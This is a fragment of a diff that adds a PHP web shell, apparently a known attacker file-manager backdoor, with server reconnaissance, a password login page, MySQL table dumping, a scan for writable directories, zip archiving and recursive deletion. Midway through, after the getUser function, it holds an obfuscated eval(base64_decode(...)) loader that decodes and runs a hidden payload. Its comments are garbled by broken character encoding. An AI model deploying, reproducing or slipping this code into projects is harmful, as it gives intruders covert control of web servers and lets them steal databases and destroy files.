        '); + } +}//end shell + +elseif ($action == 'phpenv') { + $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; + $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); + !$dis_func && $dis_func = 'No'; + $info = array( + 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), + 2 => array('Server Domain',$_SERVER['SERVER_NAME']), + 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), + 4 => array('Server OS',PHP_OS), + 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), + 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), + 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), + 8 => array('PHP run mode',strtoupper(php_sapi_name())), + 9 => array('The file path',__FILE__), + + 10 => array('PHP Version',PHP_VERSION), + 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), + 12 => array('Safe Mode',getcfg('safe_mode')), + 13 => array('Administrator',$adminmail), + 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), + 15 => array('enable_dl',getcfg('enable_dl')), + 16 => array('display_errors',getcfg('display_errors')), + 17 => array('register_globals',getcfg('register_globals')), + 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), + 19 => array('memory_limit',getcfg('memory_limit')), + 20 => array('post_max_size',getcfg('post_max_size')), + 21 => array('upload_max_filesize',$upsize), + 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), + 23 => array('disable_functions',$dis_func), + ); + + if($phpvarname) { + m($phpvarname .' : '.getcfg($phpvarname)); + } + + formhead(array('title'=>'Server environment')); + makehide('action','phpenv'); + makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); + formfooter(); + + $hp = array(0=> 'Server', 1=> 'PHP'); + for($a=0;$a<2;$a++) { + p('

        '.$hp[$a].' »

        '); + p('
          ');
+ if ($a==0) {
+ for($i=1;$i<=9;$i++) {
+ p('
        • '.$info[$i][0].':'.$info[$i][1].'
        • ');
+ }
+ } elseif ($a == 1) {
+ for($i=10;$i<=23;$i++) {
+ p('
        • '.$info[$i][0].':'.$info[$i][1].'
        • ');
+ }
+ }
+ p('
        ');
+ }
+}//end phpenv
+
+else {
+ m('Undefined Action');
+}
+
+?>
+
+
        + + Copyright (C) 2000-2010 SadrazaM All Rights Reserved. +
        + + + +'; + echo $msg; + echo '
        '; +} +function scookie($key, $value, $life = 0, $prefix = 1) { + global $admin, $timestamp, $_SERVER; + $key = ($prefix ? $admin['cookiepre'] : '').$key; + $life = $life ? $life : $admin['cookielife']; + $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; + setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport); +} +function multi($num, $perpage, $curpage, $tablename) { + $multipage = ''; + if($num > $perpage) { + $page = 10; + $offset = 5; + $pages = @ceil($num / $perpage); + if($page > $pages) { + $from = 1; + $to = $pages; + } else { + $from = $curpage - $offset; + $to = $curpage + $page - $offset - 1; + if($from < 1) { + $to = $curpage + 1 - $from; + $from = 1; + if(($to - $from) < $page && ($to - $from) < $pages) { + $to = $page; + } + } elseif($to > $pages) { + $from = $curpage - $pages + $to; + $to = $pages; + if(($to - $from) < $page && ($to - $from) < $pages) { + $from = $pages - $page + 1; + } + } + } + $multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); + for($i = $from; $i <= $to; $i++) { + $multipage .= $i == $curpage ? $i.' ' : '['.$i.'] '; + } + $multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : ''); + $multipage = $multipage ? '

        Pages: '.$multipage.'

        ' : ''; + } + return $multipage; +} +// ||-++ы++ +function loginpage() { +?> + + + Password: + + + +Can not connect to MySQL server'); + exit; + } + if($link && $dbname) { + if (!@mysql_select_db($dbname, $link)) { + p('

        Database selected has error

        '); + exit; + } + } + if($link && mysql_get_server_info() > '4.1') { + if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) { + q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link); + } + } + return $link; +} + +// +е|Ї+к-х+++ +function s_array(&$array) { + if (is_array($array)) { + foreach ($array as $k => $v) { + $array[$k] = s_array($v); + } + } else if (is_string($array)) { + $array = stripslashes($array); + } + return $array; +} + +// |х| HTML| -ы +function html_clean($content) { + $content = htmlspecialchars($content); + $content = str_replace("\n", "
        ", $content); + $content = str_replace(" ", "  ", $content); + $content = str_replace("\t", "    ", $content); + return $content; +} + +// +ё+б+и-| +function getChmod($filepath){ + return substr(base_convert(@fileperms($filepath),10,8),-4); +} + +function getPerms($filepath) { + $mode = @fileperms($filepath); + if (($mode & 0xC000) === 0xC000) {$type = 's';} + elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} + elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} + elseif (($mode & 0x8000) === 0x8000) {$type = '-';} + elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} + elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} + elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} + else {$type = '?';} + + $owner['read'] = ($mode & 00400) ? 'r' : '-'; + $owner['write'] = ($mode & 00200) ? 'w' : '-'; + $owner['execute'] = ($mode & 00100) ? 'x' : '-'; + $group['read'] = ($mode & 00040) ? 'r' : '-'; + $group['write'] = ($mode & 00020) ? 'w' : '-'; + $group['execute'] = ($mode & 00010) ? 'x' : '-'; + $world['read'] = ($mode & 00004) ? 'r' : '-'; + $world['write'] = ($mode & 00002) ? 'w' : '-'; + $world['execute'] = ($mode & 00001) ? 'x' : '-'; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} + if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} + if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 
't' : 'T';} + + return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; +} + +function getUser($filepath) { + if (function_exists('posix_getpwuid')) { + $array = @posix_getpwuid(@fileowner($filepath)); + if ($array && is_array($array)) { + return ' / '.$array['name'].'';}} return '';}$_F=__FILE__;$_X='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';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==')); +// ++| -+-+ +function deltree($deldir) { + $mydir=@dir($deldir); + while($file=$mydir->read()) { + if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { + @chmod($deldir.'/'.$file,0777); + deltree($deldir.'/'.$file); + } + if (is_file($deldir.'/'.$file)) { + @chmod($deldir.'/'.$file,0777); + @unlink($deldir.'/'.$file); + } + } + $mydir->close(); + @chmod($deldir,0777); + return @rmdir($deldir) ? 1 : 0; +} + +// #э+ё--+ф|-#|+#+л|ц++ +function bg() { + global $bgc; + return ($bgc++%2==0) ? 
'alt1' : 'alt2'; +} + +// +ё+б|#|#|-+-+ -|-|-++| +function getPath($scriptpath, $nowpath) { + if ($nowpath == '.') { + $nowpath = $scriptpath; + } + $nowpath = str_replace('\\', '/', $nowpath); + $nowpath = str_replace('//', '/', $nowpath); + if (substr($nowpath, -1) != '/') { + $nowpath = $nowpath.'/'; + } + return $nowpath; +} + +// +ё+б|#|#-+-+|-+-+|-+-+ +function getUpPath($nowpath) { + $pathdb = explode('/', $nowpath); + $num = count($pathdb); + if ($num > 2) { + unset($pathdb[$num-1],$pathdb[$num-2]); + } + $uppath = implode('/', $pathdb).'/'; + $uppath = str_replace('//', '/', $uppath); + return $uppath; +} + +// +ь#щPHP+ф+|#+- +function getcfg($varname) { + $result = get_cfg_var($varname); + if ($result == 0) { + return 'No'; + } elseif ($result == 1) { + return 'Yes'; + } else { + return $result; + } +} + +// +ь#щ|п- |щ+Ў +function getfun($funName) { + return (false !== function_exists($funName)) ? 'Yes' : 'No'; +} + +function GetList($dir){ + global $dirdata,$j,$nowpath; + !$j && $j=1; + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + $f=str_replace('//','/',$dir.'/'.$file); + if($file!='.' && $file!='..' && is_dir($f)){ + if (is_writable($f)) { + $dirdata[$j]['filename']=str_replace($nowpath,'',$f); + $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $dirdata[$j]['dirchmod']=getChmod($f); + $dirdata[$j]['dirperm']=getPerms($f); + $dirdata[$j]['dirlink']=ue($dir); + $dirdata[$j]['server_link']=$f; + $dirdata[$j]['client_link']=ue($f); + $j++; + } + GetList($f); + } + } + closedir($dh); + clearstatcache(); + return $dirdata; + } else { + return array(); + } +} + +function qy($sql) { + //echo $sql.'
        '; + $res = $error = ''; + if(!$res = @mysql_query($sql)) { + return 0; + } else if(is_resource($res)) { + return 1; + } else { + return 2; + } + return 0; +} + +function q($sql) { + return @mysql_query($sql); +} + +function fr($qy){ + mysql_free_result($qy); +} + +function sizecount($size) { + if($size > 1073741824) { + $size = round($size / 1073741824 * 100) / 100 . ' G'; + } elseif($size > 1048576) { + $size = round($size / 1048576 * 100) / 100 . ' M'; + } elseif($size > 1024) { + $size = round($size / 1024 * 100) / 100 . ' K'; + } else { + $size = $size . ' B'; + } + return $size; +} + +// -|-ї|Є# +р +class PHPZip{ + var $out=''; + function PHPZip($dir) { + if (@function_exists('gzcompress')) { + $curdir = getcwd(); + if (is_array($dir)) $filelist = $dir; + else{ + $filelist=$this -> GetFileList($dir);//+-+ --#э + foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); + } + if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); + else chdir($curdir); + if (count($filelist)>0){ + foreach($filelist as $filename){ + if (is_file($filename)){ + $fd = fopen ($filename, 'r'); + $content = @fread ($fd, filesize($filename)); + fclose ($fd); + if (is_array($dir)) $filename = basename($filename); + $this -> addFile($content, $filename); + } + } + $this->out = $this -> file(); + chdir($curdir); + } + return 1; + } + else return 0; + } + + // +ё||++|и-+-++-+ --#э + function GetFileList($dir){ + static $a; + if (is_dir($dir)) { + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + if($file!='.' && $file!='..'){ + $f=$dir .'/'. $file; + if(is_dir($f)) $this->GetFileList($f); + $a[]=$f; + } + } + closedir($dh); + } + } + return $a; + } + + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? 
getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } // end if + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + + function addFile($data, $name, $time = 0) { + $name = str_replace('\\', '/', $name); + + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $c_len = strlen($zdata); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + + $this -> datasec[] = $fr; + $new_offset = strlen(implode('', $this->datasec)); + + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset = $new_offset; + $cdrec .= $name; + + $this -> ctrl_dir[] = $cdrec; + } + + function file() { + $data = implode('', 
$this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; + } +} + +// #++|- +|+т +function sqldumptable($table, $fp=0) { + $tabledump = "DROP TABLE IF EXISTS $table;\n"; + $tabledump .= "CREATE TABLE $table (\n"; + + $firstfield=1; + + $fields = q("SHOW FIELDS FROM $table"); + while ($field = mysql_fetch_array($fields)) { + if (!$firstfield) { + $tabledump .= ",\n"; + } else { + $firstfield=0; + } + $tabledump .= " $field[Field] $field[Type]"; + if (!empty($field["Default"])) { + $tabledump .= " DEFAULT '$field[Default]'"; + } + if ($field['Null'] != "YES") { + $tabledump .= " NOT NULL"; + } + if ($field['Extra'] != "") { + $tabledump .= " $field[Extra]"; + } + } + fr($fields); + + $keys = q("SHOW KEYS FROM $table"); + while ($key = mysql_fetch_array($keys)) { + $kname=$key['Key_name']; + if ($kname != "PRIMARY" && $key['Non_unique'] == 0) { + $kname="UNIQUE|$kname"; + } + if(!is_array($index[$kname])) { + $index[$kname] = array(); + } + $index[$kname][] = $key['Column_name']; + } + fr($keys); + + while(list($kname, $columns) = @each($index)) { + $tabledump .= ",\n"; + $colnames=implode($columns,","); + + if ($kname == "PRIMARY") { + $tabledump .= " PRIMARY KEY ($colnames)"; + } else { + if (substr($kname,0,6) == "UNIQUE") { + $kname=substr($kname,7); + } + $tabledump .= " KEY $kname ($colnames)"; + } + } + + $tabledump .= "\n);\n\n"; + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + + $rows = q("SELECT * FROM $table"); + $numfields = mysql_num_fields($rows); + while ($row = mysql_fetch_array($rows)) { + $tabledump = "INSERT INTO $table VALUES("; + + $fieldcounter=-1; + $firstfield=1; + while (++$fieldcounter<$numfields) { + if (!$firstfield) { + $tabledump.=", "; + } else { + $firstfield=0; + } + + if (!isset($row[$fieldcounter])) { + 
$tabledump .= "NULL"; + } else { + $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; + } + } + + $tabledump .= ");\n"; + + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + } + fr($rows); + if ($fp) { + fwrite($fp,"\n"); + } else { + echo "\n"; + } +} + +function ue($str){ + return urlencode($str); +} + +function p($str){ + echo $str."\n"; +} + +function tbhead() { + p(''); +} +function tbfoot(){ + p('
        ');
+}
+
+function makehide($name,$value=''){
+ p("");
+}
+
+function makeinput($arg = array()){
+ $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+ $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+ !$arg['type'] && $arg['type'] = 'text';
+ $arg['title'] = $arg['title'] ? $arg['title'].'
        ' : '';
+ $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+ if ($arg['newline']) {
+ p("

        $arg[title]

        "); + } else { + p("$arg[title]"); + } +} + +function makeselect($arg = array()){ + if ($arg['onchange']) { + $onchange = 'onchange="'.$arg['onchange'].'"'; + } + $arg['title'] = $arg['title'] ? $arg['title'] : ''; + if ($arg['newline']) p('

        '); + p("$arg[title] "); + if ($arg['newline']) p('

        '); +} +function formhead($arg = array()) { + !$arg['method'] && $arg['method'] = 'post'; + !$arg['action'] && $arg['action'] = $self; + $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; + !$arg['name'] && $arg['name'] = 'form1'; + p("
        "); + if ($arg['title']) { + p('

        '.$arg['title'].' »

        '); + } +} + +function maketext($arg = array()){ + !$arg['cols'] && $arg['cols'] = 100; + !$arg['rows'] && $arg['rows'] = 25; + $arg['title'] = $arg['title'] ? $arg['title'].'
        ' : ''; + p("

        $arg[title]

        "); +} + +function formfooter($name = ''){ + !$name && $name = 'submit'; + p('

        ');
+ p('
        '); +} + +function formfoot(){ + p(''); +} + +// |ў-+|п- +function pr($a) { + echo '
        ';
        +	print_r($a);
        +	echo '
        ';
+}
+
+?>
+
\ No newline at end of file